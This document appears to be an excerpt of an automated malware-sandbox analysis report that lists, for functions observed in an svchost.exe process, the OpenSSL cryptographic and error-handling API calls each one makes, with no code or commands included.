          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F8580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92F8580
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A935C5A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93225B0 OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8A93225B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A932A850
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9328850 CRYPTO_realloc,28_2_00007FF8A9328850
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D8812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,28_2_00007FF8A92D8812
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9324800 OPENSSL_LH_delete,CRYPTO_free,28_2_00007FF8A9324800
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D2860 CRYPTO_zalloc,InitializeCriticalSection,28_2_00007FF8A92D2860
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931E810 CRYPTO_zalloc,28_2_00007FF8A931E810
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,28_2_00007FF8A92F4840
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FA8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,28_2_00007FF8A92FA8B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DE880 CRYPTO_THREAD_run_once,28_2_00007FF8A92DE880
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9342880 CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9342880
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,28_2_00007FF8A935C890
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93168B0 CRYPTO_zalloc,CRYPTO_free,28_2_00007FF8A93168B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935A8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A935A8B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9322740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8A9322740
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D8720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A92D8720
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DE700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92DE700
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9320770 CRYPTO_clear_free,CRYPTO_free,28_2_00007FF8A9320770
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931C700 CRYPTO_malloc,memcmp,memcpy,memcpy,28_2_00007FF8A931C700
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932E730 CRYPTO_free,28_2_00007FF8A932E730
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93267D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,28_2_00007FF8A93267D1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93207D0 CRYPTO_malloc,memcpy,CRYPTO_free,28_2_00007FF8A93207D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,28_2_00007FF8A931A7D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,28_2_00007FF8A934C7E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D27F0 DeleteCriticalSection,CRYPTO_free,28_2_00007FF8A92D27F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932E790 CRYPTO_free,28_2_00007FF8A932E790
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93327B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A93327B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932DA40 CRYPTO_memcmp,28_2_00007FF8A932DA40
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D9A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,28_2_00007FF8A92D9A20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9311A60 CRYPTO_free,28_2_00007FF8A9311A60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E3A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92E3A70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F3A70 CRYPTO_get_ex_data,28_2_00007FF8A92F3A70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DDA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,28_2_00007FF8A92DDA50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,28_2_00007FF8A934BAA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E1950 CRYPTO_free,CRYPTO_strdup,28_2_00007FF8A92E1950
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9337920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A9337920
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,28_2_00007FF8A9349985
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,28_2_00007FF8A934999C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93079D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8A93079D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93119A0 CRYPTO_malloc,28_2_00007FF8A93119A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93499B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A93499B3
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9359C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A9359C40
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EBC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,28_2_00007FF8A92EBC10
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9341C70 CRYPTO_realloc,28_2_00007FF8A9341C70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D1C50 CRYPTO_zalloc,28_2_00007FF8A92D1C50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D9C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,28_2_00007FF8A92D9C50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D3C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A92D3C40
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9323C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,28_2_00007FF8A9323C30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,28_2_00007FF8A9349CC1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A933FC90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,28_2_00007FF8A9349CAA
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F9CC0 EVP_MAC_CTX_free,CRYPTO_free,28_2_00007FF8A92F9CC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930FCB0 CRYPTO_free,28_2_00007FF8A930FCB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A9349B4A
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931BB00 CRYPTO_free,28_2_00007FF8A931BB00
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F7B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8A92F7B50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,28_2_00007FF8A9349B33
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D7BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8A92D7BEE
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D1BE0 CRYPTO_zalloc,28_2_00007FF8A92D1BE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DDE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,28_2_00007FF8A92DDE10
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9309E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,28_2_00007FF8A9309E60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F9E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,28_2_00007FF8A92F9E00
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9311E70 CRYPTO_realloc,28_2_00007FF8A9311E70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9323E10 CRYPTO_malloc,CRYPTO_free,28_2_00007FF8A9323E10
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F3E50 CRYPTO_free,CRYPTO_memdup,28_2_00007FF8A92F3E50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9325E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A9325E20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9327EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8A9327EC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FDEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,28_2_00007FF8A92FDEA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9345E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8A9345E80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9337E90 CRYPTO_malloc,COMP_expand_block,28_2_00007FF8A9337E90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D1EC0 CRYPTO_free,28_2_00007FF8A92D1EC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931BD60 CRYPTO_zalloc,28_2_00007FF8A931BD60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F3D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,28_2_00007FF8A92F3D70
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9325D30 CRYPTO_free,28_2_00007FF8A9325D30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D5DB0 CRYPTO_malloc,28_2_00007FF8A92D5DB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D7DA0 CRYPTO_free,28_2_00007FF8A92D7DA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,28_2_00007FF8A933DDE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8A9349DA6
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,28_2_00007FF8A934BDB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FA030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,28_2_00007FF8A92FA030
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9340070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,28_2_00007FF8A9340070
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9312000 CRYPTO_free,28_2_00007FF8A9312000
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F4060 CRYPTO_free,CRYPTO_memdup,28_2_00007FF8A92F4060
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9310010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free,28_2_00007FF8A9310010
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931C0D0 CRYPTO_free,28_2_00007FF8A931C0D0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E40E0 CRYPTO_get_ex_data,28_2_00007FF8A92E40E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93040E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8A93040E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F9F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy,28_2_00007FF8A92F9F30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F3F00 CRYPTO_free,CRYPTO_strdup,28_2_00007FF8A92F3F00
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DDF70 CRYPTO_malloc,BIO_snprintf,28_2_00007FF8A92DDF70
